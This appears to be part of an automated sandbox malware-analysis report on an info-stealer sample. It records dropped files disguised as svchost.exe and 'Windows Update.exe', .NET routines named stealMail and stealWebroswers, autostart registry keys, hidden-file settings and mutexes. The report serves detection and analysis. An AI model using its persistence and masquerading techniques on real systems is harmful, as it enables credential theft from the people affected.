Source: Windows Update.exe.7.dr, Form1.cs; Base64 encoded string: 'kbQnaMAqc4rJo1mT4B7RhwJe+fGXJpsZbpD3A8cRLpF8r37V6hwFJclFmi3TuPcV', 'jrjjihHgoFSS2LreSmIPt+dvMS9SWwm2bpCpzwButM0keLFgPXou3jD1/WWxI/SyPaT8uEnh2ZPIQJkcNfdo9K9mbud854hZXCXmEexYTBZThg83UWFB79E6a49yUNIf'
Source: 7.2.iExplorer.exe.6d0000.0.unpack, Form1.cs; Base64 encoded string: 'kbQnaMAqc4rJo1mT4B7RhwJe+fGXJpsZbpD3A8cRLpF8r37V6hwFJclFmi3TuPcV', 'jrjjihHgoFSS2LreSmIPt+dvMS9SWwm2bpCpzwButM0keLFgPXou3jD1/WWxI/SyPaT8uEnh2ZPIQJkcNfdo9K9mbud854hZXCXmEexYTBZThg83UWFB79E6a49yUNIf'
Source: 7.0.iExplorer.exe.6d0000.0.unpack, Form1.cs; Base64 encoded string: 'kbQnaMAqc4rJo1mT4B7RhwJe+fGXJpsZbpD3A8cRLpF8r37V6hwFJclFmi3TuPcV', 'jrjjihHgoFSS2LreSmIPt+dvMS9SWwm2bpCpzwButM0keLFgPXou3jD1/WWxI/SyPaT8uEnh2ZPIQJkcNfdo9K9mbud854hZXCXmEexYTBZThg83UWFB79E6a49yUNIf'
Source: 8.0.Windows Update.exe.3d0000.4.unpack, Form1.cs; Base64 encoded string: 'kbQnaMAqc4rJo1mT4B7RhwJe+fGXJpsZbpD3A8cRLpF8r37V6hwFJclFmi3TuPcV', 'jrjjihHgoFSS2LreSmIPt+dvMS9SWwm2bpCpzwButM0keLFgPXou3jD1/WWxI/SyPaT8uEnh2ZPIQJkcNfdo9K9mbud854hZXCXmEexYTBZThg83UWFB79E6a49yUNIf'
Source: 8.0.Windows Update.exe.3d0000.10.unpack, Form1.cs; Base64 encoded string: 'kbQnaMAqc4rJo1mT4B7RhwJe+fGXJpsZbpD3A8cRLpF8r37V6hwFJclFmi3TuPcV', 'jrjjihHgoFSS2LreSmIPt+dvMS9SWwm2bpCpzwButM0keLFgPXou3jD1/WWxI/SyPaT8uEnh2ZPIQJkcNfdo9K9mbud854hZXCXmEexYTBZThg83UWFB79E6a49yUNIf'
Source: C:\Windows\SysWOW64\WerFault.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6292
Source: C:\Windows\SysWOW64\WerFault.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6280
Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe; Mutant created: \Sessions\1\BaseNamedObjects\0w96J1537j
Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Users\user\Desktop\aaVb1xEmrd.exe; Process created: C:\Users\user\AppData\Local\Temp\iExplorer.exe
Source: svchost.exe.1.dr, adiGWFtrqf.cs; Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: taskhost.exe.1.dr, Form1.cs; Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock' (3 occurrences)
Source: taskhost.exe.1.dr, Form1.cs; Cryptographic APIs: 'CreateDecryptor'
Source: iExplorer.exe.1.dr, Form1.cs; Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock' (3 occurrences)
Source: iExplorer.exe.1.dr, Form1.cs; Cryptographic APIs: 'CreateDecryptor'
Source: C:\Users\user\AppData\Local\Temp\svchost.exe; File read: C:\Windows\System32\drivers\etc\hosts (2 times)
Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; File read: C:\Windows\System32\drivers\etc\hosts (3 times)
Source: C:\Users\user\AppData\Roaming\Windows Update.exe; File read: C:\Windows\System32\drivers\etc\hosts (4 times)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe; File read: C:\Windows\System32\drivers\etc\hosts (4 times)
Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe; File read: C:\Windows\System32\drivers\etc\hosts (2 times)
Source: C:\Windows\System32\svchost.exe; File read: C:\Windows\System32\drivers\etc\hosts (2 times)
Source: C:\Windows\SysWOW64\WerFault.exe; File read: C:\Windows\System32\drivers\etc\hosts (4 times)
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeAutomated click: OK
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeAutomated click: Continue
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeAutomated click: Continue
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeAutomated click: Continue
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeAutomated click: Continue
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeAutomated click: Continue
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeAutomated click: Continue
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeAutomated click: Continue
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeAutomated click: Continue
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeAutomated click: Continue
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exeAutomated click: Continue
                    Source: Window Recorder | Window detected: More than 3 window changes detected
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exe | File opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_88df21dd2faf7c49\MSVCR80.dll
                    Source: Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: Windows Update.exe, 00000008.00000000.277693996.0000000000A27000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\SYSTEM32\winnlsres.dlls.pdb source: svchost.exe, 0000000A.00000002.490336011.00000000010A9000.00000004.00000001.sdmp
                    Source: Binary string: symbols\dll\mscorlib.pdb source: Windows Update.exe, 00000008.00000000.287657799.0000000008F0A000.00000004.00000001.sdmp
                    Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdb source: Windows Update.exe, 00000008.00000000.287657799.0000000008F0A000.00000004.00000001.sdmp
                    Source: Binary string: C:\Windows\dll\mscorlib.pdb source: Windows Update.exe, 00000008.00000000.277693996.0000000000A27000.00000004.00000040.sdmp
                    Source: Binary string: System.Windows.Forms.pdb5c5619 source: svchost.exe, 0000000A.00000002.491098692.0000000001502000.00000004.00000001.sdmp
                    Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: taskhost.exe, iExplorer.exe, Windows Update.exe
                    Source: Binary string: mscorlib.pdbndows Update.exe source: Windows Update.exe, 00000008.00000000.277693996.0000000000A27000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\mscorlib.pdbd source: Windows Update.exe, 00000008.00000000.277693996.0000000000A27000.00000004.00000040.sdmp
                    Source: Binary string: rlib.pdb source: Windows Update.exe, 00000008.00000000.277693996.0000000000A27000.00000004.00000040.sdmp
                    Source: Binary string: System.pdb source: svchost.exe, 0000000A.00000002.491122955.0000000001513000.00000004.00000001.sdmp
                    Source: Binary string: mscorlib.pdb source: Windows Update.exe, 00000008.00000000.287657799.0000000008F0A000.00000004.00000001.sdmp
                    Source: Binary string: 1?pC:\Windows\mscorlib.pdb source: Windows Update.exe, 00000008.00000000.287657799.0000000008F0A000.00000004.00000001.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\System.Windows.Forms.pdbl source: svchost.exe, 0000000A.00000002.491098692.0000000001502000.00000004.00000001.sdmp
                    Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: taskhost.exe, iExplorer.exe, Windows Update.exe
                    Source: Binary string: C:\Windows\assembly\GA.pdbmscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll source: Windows Update.exe, 00000008.00000000.287657799.0000000008F0A000.00000004.00000001.sdmp
                    Source: Binary string: indows\mscorlib.pdbpdblib.pdb source: Windows Update.exe, 00000008.00000000.277693996.0000000000A27000.00000004.00000040.sdmp
                    Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: taskhost.exe, iExplorer.exe, Windows Update.exe, vbc.exe, 00000014.00000002.274318737.0000000000400000.00000040.00000001.sdmp
                    Source: Binary string: ws\System.Windows.Forms.pdbpdbrms.pdb source: svchost.exe, 0000000A.00000002.491098692.0000000001502000.00000004.00000001.sdmp
                    Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb.p source: svchost.exe, 0000000A.00000002.491098692.0000000001502000.00000004.00000001.sdmp
                    Source: Binary string: C:\Windows\System.Windows.Forms.pdbsys source: svchost.exe, 0000000A.00000002.491098692.0000000001502000.00000004.00000001.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: Windows Update.exe, 00000008.00000000.277693996.0000000000A27000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdbH source: Windows Update.exe, 00000008.00000000.287657799.0000000008F0A000.00000004.00000001.sdmp
                    Source: Binary string: kC:\Windows\dll\System.Windows.Forms.pdb source: svchost.exe, 0000000A.00000002.491098692.0000000001502000.00000004.00000001.sdmp
                    Source: Binary string: C:\Windows\System.pdb source: svchost.exe, 0000000A.00000002.491122955.0000000001513000.00000004.00000001.sdmp

                    Data Obfuscation:

                    .NET source code contains potential unpacker
                    Source: taskhost.exe.1.dr, Form1.cs | .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: taskhost.exe.1.dr, Form1.cs | .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: taskhost.exe.1.dr, Form1.cs | .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: taskhost.exe.1.dr, Form1.cs | .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: iExplorer.exe.1.dr, Form1.cs | .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: iExplorer.exe.1.dr, Form1.cs | .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: iExplorer.exe.1.dr, Form1.cs | .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: iExplorer.exe.1.dr, Form1.cs | .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: WindowsUpdate.exe.5.dr, Form1.cs | .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: WindowsUpdate.exe.5.dr, Form1.cs | .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: WindowsUpdate.exe.5.dr, Form1.cs | .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: WindowsUpdate.exe.5.dr, Form1.cs | .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.0.taskhost.exe.9c0000.0.unpack, Form1.cs | .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.0.taskhost.exe.9c0000.0.unpack, Form1.cs | .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.0.taskhost.exe.9c0000.0.unpack, Form1.cs | .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.0.taskhost.exe.9c0000.0.unpack, Form1.cs | .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.2.taskhost.exe.9c0000.0.unpack, Form1.cs | .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.2.taskhost.exe.9c0000.0.unpack, Form1.cs | .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.2.taskhost.exe.9c0000.0.unpack, Form1.cs | .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.2.taskhost.exe.9c0000.0.unpack, Form1.cs | .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: Windows Update.exe.7.dr, Form1.cs | .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: Windows Update.exe.7.dr, Form1.cs | .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: Windows Update.exe.7.dr, Form1.cs | .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: Windows Update.exe.7.dr, Form1.cs | .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 7.2.iExplorer.exe.6d0000.0.unpack, Form1.cs | .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 7.2.iExplorer.exe.6d0000.0.unpack, Form1.cs | .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 7.2.iExplorer.exe.6d0000.0.unpack, Form1.cs | .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 7.2.iExplorer.exe.6d0000.0.unpack, Form1.cs | .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 7.0.iExplorer.exe.6d0000.0.unpack, Form1.cs | .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 7.0.iExplorer.exe.6d0000.0.unpack, Form1.cs | .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 7.0.iExplorer.exe.6d0000.0.unpack, Form1.cs | .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 7.0.iExplorer.exe.6d0000.0.unpack, Form1.cs | .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 8.0.Windows Update.exe.3d0000.4.unpack, Form1.cs | .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 8.0.Windows Update.exe.3d0000.4.unpack, Form1.cs | .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 8.0.Windows Update.exe.3d0000.4.unpack, Form1.cs | .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 8.0.Windows Update.exe.3d0000.4.unpack, Form1.cs | .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 8.0.Windows Update.exe.3d0000.10.unpack, Form1.cs | .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 8.0.Windows Update.exe.3d0000.10.unpack, Form1.cs | .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 8.0.Windows Update.exe.3d0000.10.unpack, Form1.cs | .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 8.0.Windows Update.exe.3d0000.10.unpack, Form1.cs | .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Code function: 5_2_00A30712 push eax; ret 5_2_00A30726
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Code function: 5_2_00A30712 push eax; ret 5_2_00A3074E
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Code function: 5_2_00A0B87E push ecx; ret 5_2_00A0B88E
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Code function: 5_2_00A0BA9D push eax; ret 5_2_00A0BAB1
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Code function: 5_2_00A0BA9D push eax; ret 5_2_00A0BAD9
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Code function: 5_2_02B07EF2 push eax; ret 5_2_02B07EF5
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Code function: 5_2_052049A9 push edx; ret 5_2_052049AA
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Code function: 5_2_052049AB push edx; ret 5_2_052049AE
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Code function: 5_2_052049AF push edx; ret 5_2_052049B2
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Code function: 5_2_05204B87 push esi; ret 5_2_05204B8A
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Code function: 5_2_05204B8B push edi; ret 5_2_05204B92
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Code function: 5_2_05204830 push ecx; ret 5_2_05204832
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Code function: 5_2_05204833 push ecx; ret 5_2_0520483A
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Code function: 5_2_05200016 push es; ret 5_2_0520006A
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Code function: 5_2_05204661 push eax; ret 5_2_05204662
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Code function: 5_2_05204663 push eax; ret 5_2_0520466A
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Code function: 5_2_05204A59 push ebx; ret 5_2_05204A5A
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Code function: 5_2_05204AA9 push ebx; ret 5_2_05204AAA
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Code function: 5_2_05204AE7 push esp; ret 5_2_05204AEA
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Code function: 5_2_05204ADF push ebx; ret 5_2_05204AE2
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Code function: 7_2_0073F44E push eax; ret 7_2_0073F462
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Code function: 7_2_0073F44E push eax; ret 7_2_0073F48A
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Code function: 7_2_0071A5BA push ecx; ret 7_2_0071A5CA
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Code function: 7_2_0071A7D9 push eax; ret 7_2_0071A7ED
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Code function: 7_2_0071A7D9 push eax; ret 7_2_0071A815
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Code function: 8_2_0043F44E push eax; ret 8_2_0043F462
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Code function: 8_2_0043F44E push eax; ret 8_2_0043F48A
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Code function: 8_2_0041A5BA push ecx; ret 8_2_0041A5CA
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Code function: 8_2_0041A7D9 push eax; ret 8_2_0041A7ED
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Code function: 8_2_0041A7D9 push eax; ret 8_2_0041A815
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe | Code function: 8_2_00CA6063 pushad ; retf 0000h 8_2_00CA6072
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exe | Code function: 1_2_00405CAA GetModuleHandleA,LoadLibraryA,GetProcAddress, 1_2_00405CAA
                    Source: initial sample | Static PE information: section name: .text entropy: 7.57942816891

                    Persistence and Installation Behavior:

                    Drops PE files with benign system names
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exe | File created: C:\Users\user\AppData\Local\Temp\svchost.exe
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exe | File created: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exe | File created: C:\Users\user\AppData\Local\Temp\MULTIBOT_NEWW.exe
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exe | File created: C:\Users\user\AppData\Local\Temp\taskhost.exe
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | File created: C:\Users\user\AppData\Roaming\Windows Update.exe
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows Firewall\WIN32.exe
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | File created: C:\Users\user\AppData\Roaming\WindowsUpdate.exe
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exe | File created: C:\Users\user\AppData\Local\Temp\iExplorer.exe

                    Boot Survival:

                    Creates multiple autostart registry keys
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Windows Update
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run server host protocol windows
                    Creates an undocumented autostart registry key
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{663zMYl1-971G-Rz79-18o0-8F397xVI0j0L} stubpath
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run server host protocol windows
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run server host protocol windows
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Windows Update

                    Hooking and other Techniques for Hiding and Protection:

                    Changes the view of files in windows explorer (hidden files and folders)
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\MULTIBOT_NEWW.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
